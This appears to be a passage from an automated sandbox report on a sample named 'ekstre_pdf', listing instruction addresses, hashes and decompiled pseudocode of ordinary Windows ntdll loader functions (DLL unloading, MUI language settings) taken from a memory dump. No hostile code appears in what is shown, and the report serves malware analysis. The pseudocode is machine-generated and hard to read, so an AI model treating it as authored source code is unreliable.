0x340707c1
0x340707c5
0x340707c8
0x340707cb
0x340707d0
0x340707d3
0x340707d3
0x340707d6
0x340c5008
0x340707e4
0x340707e4
0x340707e6
0x340707e6
0x340707e9
0x340707ee
0x3407081b
0x3407081b
0x3407081e
0x34070827
0x3407082d
0x34070833
0x34070839
0x3407083f
0x34070848
0x340708fd
0x34070903
0x34070903
0x3407084e
0x34070851
0x34070855
0x34070945
0x3407094d
0x34070950
0x34070953
0x34070964
0x00000000
0x34070964
0x34070955
0x00000000
0x3407085b
0x3407085b
0x3407086e
0x34070876
0x34070879
0x34070879
0x3407087c
0x34070880
0x34070885
0x340708dd
0x340708de
0x340708e1
0x340708e6
0x340708f3
0x340708f8
0x340708f8
0x34070887
0x34070887
0x34070887
0x34070889
0x34070892
0x34070897
0x340c505d
0x340c5060
0x00000000
0x00000000
0x340c506f
0x340708a2
0x340708a5
0x340c5079
0x340c507f
0x340c5086
0x00000000
0x00000000
0x340c5091
0x340c5093
0x340c50a5
0x340c5095
0x340c509e
0x340c509e
0x340c50af
0x340c50be
0x340708ae
0x340708b4
0x340708b9
0x340c50c8
0x340c50cb
0x00000000
0x00000000
0x340c50da
0x340708c4
0x340708c7
0x340c50e9
0x340c50eb
0x340c50fd
0x340c50ed
0x340c50f6
0x340c50f6
0x340c5113
0x340c5113
0x00000000
0x340708cd
0x340708bf
0x340708bf
0x00000000
0x340708bf
0x340708ab
0x340708ab
0x00000000
0x340708ab
0x3407089d
0x3407089d
0x00000000
0x3407089d
0x340707f0
0x340707f0
0x340707f8
0x340c5014
0x340c5017
0x340c501a
0x340c5036
0x340c503d
0x00000000
0x00000000
0x00000000
0x00000000
0x340c501c
0x340c501c
0x340c501c
0x340c501e
0x340c5020
0x340c5023
0x340c5026
0x00000000
0x00000000
0x340c5028
0x340c502b
0x340c502e
0x00000000
0x00000000
0x00000000
0x340c5030
0x340c5035
0x340c5035
0x00000000
0x340c5035
0x340707fe
0x340707fe
0x34070801
0x34070803
0x34070808
0x340c5053
0x34070816
0x34070816
0x34070818
0x34070818
0x00000000
0x34070808
0x340707ee
0x34070789
0x34070789
0x00000000
0x34070789
0x34070732
0x34070736
0x340c4f63
0x340c4f66
0x340c4f66
0x340c4f6b
0x340c4f6d
0x00000000
0x00000000
0x340c4f76
0x340c4f79
0x340c4f7b
0x340c4f8d
0x340c4f92
0x340c4f92
0x340c4f95
0x00000000
0x340c4f95
0x3407073c
0x34070742
0x3407074b
0x00000000
0x00000000
0x00000000
0x3407074b
0x340706ff

Strings

HEAP[%wZ]: , xrefs: 340C4EBB
(UCRBlock->Size >= *Size), xrefs: 340C4ED7
HEAP: , xrefs: 340C4ECA

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 78292753cef9475d8f3eeb2bb8d4dac509d5c3efdb35513dc4c0c1a4368619e4
Instruction ID: 20ad1d257549d5cb51873ee02d395d259ee166a56053a3f21fb5010087d7c49b
Opcode Fuzzy Hash: 78292753cef9475d8f3eeb2bb8d4dac509d5c3efdb35513dc4c0c1a4368619e4
Instruction Fuzzy Hash: F5F18874B00605DFEB05CF68CA90B6EBBF5FF44344F2082A9E4069B291D734E981CB96

Uniqueness

Uniqueness Score: -1.00%

Function 34089723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179
timeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E34089723(signed int __ecx, void* __edx) {
				char _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t49;
				signed int _t50;
				signed int _t60;
				signed int _t69;
				signed int _t70;
				intOrPtr _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				signed int* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				intOrPtr* _t105;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t110 = __ecx;
				_v16 =  *[fs:0x30];
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L9:
					_t13 = _t110 + 0x20;
					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
					__eflags =  *_t13;
					E3408A4E3(_t82, _t87, _t103, _t110,  *_t13);
					L10:
					__eflags =  *0x341565f0 - _t82; // 0x0
					if(__eflags != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x34159214; // 0x0
						_t88 = 0x20;
						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E3406FED0(0x341532d8);
					_t49 =  *_t110;
					while(1) {
						_v20 = _t49;
						__eflags = _t49 - _t110;
						if(_t49 == _t110) {
							break;
						}
						_t16 = _t49 - 0x54; // 0x773c36a0
						_t108 = _t16;
						__eflags =  *(_t108 + 0x34) & 0x00000008;
						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							E34080C2C(_t108, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x341591e0(_t108);
								 *_t82();
							}
							_t87 = _t108;
							E340698DE(_t87, "true");
							_t79 = _v24;
							__eflags =  *(_t79 + 0x68) & 0x00000100;
							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
								_t87 = _t108;
								E340E85AA(_t87);
							}
						}
						__eflags =  *0x341537c0 & 0x00000005;
						if(__eflags != 0) {
							_t43 = _t108 + 0x24; // -48
							E340DE692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t108 + 0x18)));
						E3408A390(_t82, _t87, _t108, _t110, __eflags);
						_t49 =  *_v28;
					}
					_push(0x341532d8);
					_t50 = E3406E740(_t87);
					while(1) {
						L3:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t104 =  *_t89;
						__eflags = _t104 - _t89;
						if(_t104 != _t89) {
							_t50 =  *_t104;
							 *_t89 = _t50;
						} else {
							_t32 = _t110 + 0x18;
							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
							__eflags =  *_t32;
						}
						__eflags = _t104;
						if(_t104 == 0) {
							break;
						} else {
							L34072330(_t50, 0x34156668);
							_t86 =  *((intOrPtr*)(_t104 + 4));
							_t35 = _t104 + 8; // 0x8
							_t100 = _t35;
							_t93 =  *(_t86 + 0x1c);
							_t60 =  *_t93;
							_v16 = _t60;
							__eflags = _t60 - _t100;
							if(_t60 == _t100) {
								L27:
								 *_t93 =  *_t100;
								__eflags =  *(_t86 + 0x1c) - _t100;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									_t69 =  ~(_t93 - _t100) & _t93;
									__eflags = _t69;
									 *(_t86 + 0x1c) = _t69;
								}
								_push( &_v4);
								E3407D963(_t86, _t86, 0, _t104, _t110, __eflags);
								E340724D0(0x34156668);
								__eflags = _v12;
								if(_v12 != 0) {
									E34089723(_t86, 0);
								}
								_t50 = E34073BC0( *0x34155d74, 0, _t104);
								continue;
							}
							_t112 = _t60;
							do {
								_t70 =  *_t112;
								_t93 = _t112;
								_t112 = _t70;
								__eflags = _t70 - _t100;
							} while (_t70 != _t100);
							_t110 = _v8;
							goto L27;
						}
					}
					_t105 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t105 == _t110) {
						L8:
						return _t50;
					} else {
						goto L5;
					}
					do {
						L5:
						_t85 =  *_t105;
						_t107 = _t105 + 0xffffffac;
						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
						E34089938(L34072330(_t50, 0x34156668), _t107);
						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
							_t28 = _t107 + 0x74; // -56
							L34089B40(_t85, _t107, _t110, 0x341567ac);
							_t29 = _t107 + 0x68; // -68
							L34089B40(_t85, _t107, _t110, 0x341567a4);
							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
						}
						E340724D0(0x34156668);
						if( *0x34155d70 != 0) {
							E3409680F(_t107);
						}
						_t50 = E3407D3E1(_t85, _t107, _t110);
						_t105 = _t85;
					} while (_t85 != _t110);
					goto L8;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L10;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
					goto L9;
				}
				goto L3;
			}

0x34089723
0x3408972b
0x34089736
0x34089738
0x3408973c
0x3408973e
0x34089742
0x34089747
0x340897bc
0x340897bc
0x340897bc
0x340897bc
0x340897c0
0x340897c5
0x340897c5
0x340897cb
0x34089900
0x34089908
0x34089913
0x34089914
0x34089916
0x34089918
0x34089918
0x340897d6
0x340897db
0x340897dd
0x340897dd
0x340897e1
0x340897e3
0x00000000
0x00000000
0x340897e5
0x340897e5
0x340897e8
0x340897ec
0x340897ee
0x340897f1
0x340897f4
0x340897f9
0x340897fb
0x34089922
0x34089928
0x34089928
0x34089803
0x34089805
0x3408980a
0x3408980e
0x34089815
0x340cdade
0x340cdae0
0x340cdae0
0x34089815
0x3408981b
0x34089822
0x340cdaea
0x340cdb04
0x340cdb09
0x340cdb09
0x34089828
0x3408982a
0x3408982d
0x34089836
0x34089836
0x3408983a
0x3408983f
0x34089755
0x34089755
0x34089755
0x3408975a
0x00000000
0x00000000
0x3408986e
0x34089870
0x34089872
0x3408992f
0x34089931
0x34089878
0x34089878
0x34089878
0x34089878
0x34089878
0x3408987c
0x3408987e
0x00000000
0x34089884
0x34089889
0x3408988e
0x34089891
0x34089891
0x34089894
0x34089897
0x34089899
0x3408989d
0x3408989f
0x340898b1
0x340898b3
0x340898b5
0x340898b8
0x340898c0
0x340898c2
0x340898c2
0x340898c4
0x340898c4
0x340898cd
0x340898d0
0x340898da
0x340898df
0x340898e4
0x340898e8
0x340898e8
0x340898f6
0x00000000
0x340898f6
0x340898a1
0x340898a3
0x340898a3
0x340898a5
0x340898a7
0x340898a9
0x340898a9
0x340898ad
0x00000000
0x340898ad
0x3408987e
0x34089760
0x34089762
0x3408976b
0x340897b5
0x340897bb
0x00000000
0x00000000
0x00000000
0x3408976d
0x3408976d
0x3408976d
0x3408976f
0x34089777
0x34089782
0x3408978b
0x34089849
0x34089852
0x34089857
0x34089860
0x34089865
0x34089865
0x34089796
0x340897a2
0x340cdb13
0x340cdb13
0x340897aa
0x340897af
0x340897b1
0x00000000
0x3408976d
0x3408974d
0x00000000
0x00000000
0x34089753
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34089922

Strings

Unmapping DLL "%wZ", xrefs: 340CDAEE
LdrpUnloadNode, xrefs: 340CDAF5
minkernel\ntdll\ldrsnap.c, xrefs: 340CDAFF

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: 4b6ddbe7ee5893e8f164c787e5f511d0a0f9d142c9b9f990f42af0661a532f50
Instruction ID: 66bc5148b38b6544113061d3b5afd2422266c0ab3e12d9572024443cc3d95027
Opcode Fuzzy Hash: 4b6ddbe7ee5893e8f164c787e5f511d0a0f9d142c9b9f990f42af0661a532f50
Instruction Fuzzy Hash: 8651CE75700B02DFE710EF38CA84A5D77E5BF84218F1406EDE8969B6A1DB30A815CF92

Uniqueness

Uniqueness Score: -1.00%

Function 3409C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E3409C640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
				_t25 = E34080130();
				if(_t25 != 0) {
					L34072330(_t25, 0x34155b5c);
					_t27 =  *0x34159224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E34059050( *0x3415921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							E340724D0(0x34155b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x3415b370 ^ _t87;
							_t76 = _t65;
							 *0x341591e0( &_v544, 0x104, _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x3415660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									E340ECB20(0x34155b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x34156608 & 0x0000ffff) + 2 + _t67;
									_t42 = E34075D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E340810D0(_t67,  &_v572, 0x34156608);
										E340810D0(_t67,  &_v580,  &_v572);
										E3406FE40(_t67,  &_v588, ";");
										E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x3415660c);
										 *0x34156608 = _v608;
										_t54 = _v604;
										 *0x3415660c = _t54;
										 *0x34156604 = _t54;
										E340ED4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x341537c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E340DE692();
											_t56 =  *0x341537c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return E340A4B50(_t39, 0x34155b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x34159224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E34059050( *0x3415921c, "true");
								}
							}
							_t25 = E340724D0(0x34155b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}

0x3409c640
0x3409c642
0x3409c644
0x3409c645
0x3409c647
0x3409c64e
0x3409c65a
0x3409c65f
0x3409c664
0x3409c666
0x3409c668
0x3409c6a4
0x3409c6a6
0x00000000
0x3409c6a8
0x3409c6a8
0x00000000
0x3409c6a8
0x3409c66a
0x3409c66a
0x3409c66c
0x3409c675
0x3409c675
0x3409c67a
0x3409c67d
0x3409c6ab
0x3409c6ac
0x3409c6b3
0x3409c6b4
0x3409c6be
0x3409c6cb
0x3409c6dc
0x3409c6df
0x3409c6e9
0x3409c6e9
0x3409c6eb
0x340d8090
0x340d809b
0x340d80a4
0x340d80a9
0x340d80ae
0x340d817f
0x340d8183
0x340d8188
0x340d8189
0x00000000
0x340d80b4
0x340d80c4
0x340d80cc
0x340d80d1
0x340d80d5
0x340d80d7
0x340d8114
0x340d8116
0x340d811b
0x340d812a
0x340d8139
0x340d8148
0x340d815e
0x340d8167
0x340d816c
0x340d8170
0x340d8175
0x340d817a
0x00000000
0x340d80d9
0x340d80d9
0x340d80de
0x340d80e0
0x340d80e2
0x340d80e7
0x340d80e9
0x340d80ee
0x340d80f3
0x340d80f8
0x340d80fd
0x340d8102
0x340d8102
0x340d8105
0x340d8107
0x340d8109
0x340d8109
0x340d810a
0x340d810a
0x340d80d7
0x3409c6f1
0x3409c6f1
0x3409c6f1
0x3409c6f1
0x3409c6f1
0x3409c6fa
0x3409c6fb
0x3409c705
0x3409c67f
0x3409c67f
0x3409c67f
0x3409c680
0x3409c680
0x3409c685
0x3409c687
0x3409c689
0x3409c68b
0x3409c68d
0x3409c697
0x3409c697
0x3409c68d
0x3409c69d
0x00000000
0x3409c69d
0x3409c67d
0x3409c650
0x3409c650
0x3409c653
0x3409c653

APIs

RtlDebugPrintTimes.NTDLL ref: 3409C6DF

Strings

Failed to reallocate the system dirs string !, xrefs: 340D80E2
LdrpInitializePerUserWindowsDirectory, xrefs: 340D80E9
minkernel\ntdll\ldrinit.c, xrefs: 340D80F3

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: 773cab0a7d5c18c5fa75ed523bfeeb12ed12f97842ad8d8a0c5140dfeaf3f088
Instruction ID: aad5edde89ac525ead82cd0cf513a79ab601d9e42669f44edf3de22e08c1d0d4
Opcode Fuzzy Hash: 773cab0a7d5c18c5fa75ed523bfeeb12ed12f97842ad8d8a0c5140dfeaf3f088
Instruction Fuzzy Hash: A041F0B5B14700AFE710DB74DE44B8B3BECEF85654F0058EAB858A3260EB30D8158F96

Uniqueness

Uniqueness Score: -1.00%

Function 3408510F Relevance: 6.7, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E3408510F(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E34088BD1(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E34088BD1(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E34088BD1(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E34088BD1(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E34088BD1(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t71 = _v12 + 4; // 0x6
						_t255 = _t71;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = E34075D90(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E340A88C0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E340AA8B0(_t276, ";");
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E340A5050(0,  &_v68, _t170);
									if(E340856E0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E340A5050(_t257,  &_v68, _t243);
								if(E340856E0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E340AA8B0(_t278, ";");
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t48 = _v12 + 4; // 0x6
					_t260 = _t48;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = E34075D90(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E340A88C0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E340AA8B0(_v16, ";");
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E340A5050(_t262,  &_v68, _t244);
								if(E340856E0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E340AA8B0(_t282, ";");
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E340A5050(_t262,  &_v68, _t201);
							if(E340856E0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t26 = _v12 + 4; // 0x6
				_t264 = _t26;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = E34075D90(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E340A88C0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E340AA8B0(_t280, ";");
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E340A5050(_t267,  &_v68, _t245);
							if(E340856E0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E340AA8B0(_t284, ";");
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E340A5050(_t267,  &_v68, _t224);
						if(E340856E0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x34085117
0x3408511d
0x3408511f
0x34085121
0x34085124
0x34085127
0x3408512a
0x3408512d
0x34085130
0x34085133
0x34085136
0x3408513a
0x3408513c
0x34085141
0x340cb9ab
0x340cb9b0
0x34085460
0x34085463
0x34085469
0x3408546f
0x34085475
0x3408547b
0x34085481
0x34085484
0x3408548a
0x34085491
0x34085496
0x34085496
0x3408515e
0x340cb9b7
0x340cb9c1
0x340cb9d0
0x340cb9d0
0x340cb9d5
0x340cb9d5
0x3408517b
0x3408518a
0x34085190
0x34085195
0x34085195
0x340851af
0x3408526f
0x34085286
0x34085348
0x3408535f
0x34085446
0x34085446
0x34085449
0x34085449
0x3408544b
0x3408544f
0x340cbae9
0x340cbae9
0x34085455
0x3408545a
0x340cbaf5
0x340cbb08
0x340cbb0f
0x340cbb11
0x340cbb14
0x340cbb14
0x340cbaf5
0x00000000
0x3408545a
0x34085368
0x34085368
0x3408536b
0x34085370
0x340cbaa5
0x340cbaa7
0x34085376
0x34085387
0x34085389
0x3408538c
0x3408538c
0x34085391
0x340cbaaf
0x340cbab2
0x00000000
0x34085397
0x3408539c
0x340853a4
0x340853b2
0x340853b5
0x340853b8
0x340853fc
0x340853fc
0x34085404
0x3408540b
0x3408541f
0x34085421
0x34085421
0x3408541f
0x34085424
0x340cbabf
0x340cbacc
0x340cbad1
0x340cbad4
0x3408542a
0x3408542a
0x3408542a
0x3408542c
0x34085431
0x3408543e
0x3408543e
0x34085443
0x00000000
0x34085443
0x340853ba
0x340853bd
0x340853bf
0x340853c2
0x340853ca
0x340853de
0x340853e0
0x340853e0
0x340853e7
0x340853ee
0x340853f1
0x340853f2
0x340853f6
0x340853f9
0x00000000
0x340853f9
0x34085391
0x3408528f
0x3408528f
0x34085292
0x34085297
0x340cba41
0x340cba43
0x3408529d
0x340852ae
0x340852b0
0x340852b3
0x340852b3
0x340852b8
0x340cba4b
0x340cba4e
0x00000000
0x340852be
0x340852c3
0x340852c8
0x340852cb
0x340852ce
0x340852dd
0x340852e0
0x340852e3
0x340cba58
0x340cba5b
0x340cba5d
0x340cba60
0x340cba68
0x340cba7c
0x340cba7e
0x340cba7e
0x340cba85
0x340cba8c
0x340cba8f
0x340cba90
0x340cba94
0x340cba97
0x340cba97
0x340852e9
0x340852ec
0x340852f1
0x340852f8
0x3408530c
0x340cba9f
0x340cba9f
0x3408530c
0x34085314
0x34085323
0x34085328
0x3408532b
0x3408532b
0x3408532e
0x34085333
0x34085340
0x34085340
0x34085345
0x00000000
0x34085345
0x340852b8
0x340851b8
0x340851b8
0x340851bb
0x340851c0
0x340cb9dd
0x340851c6
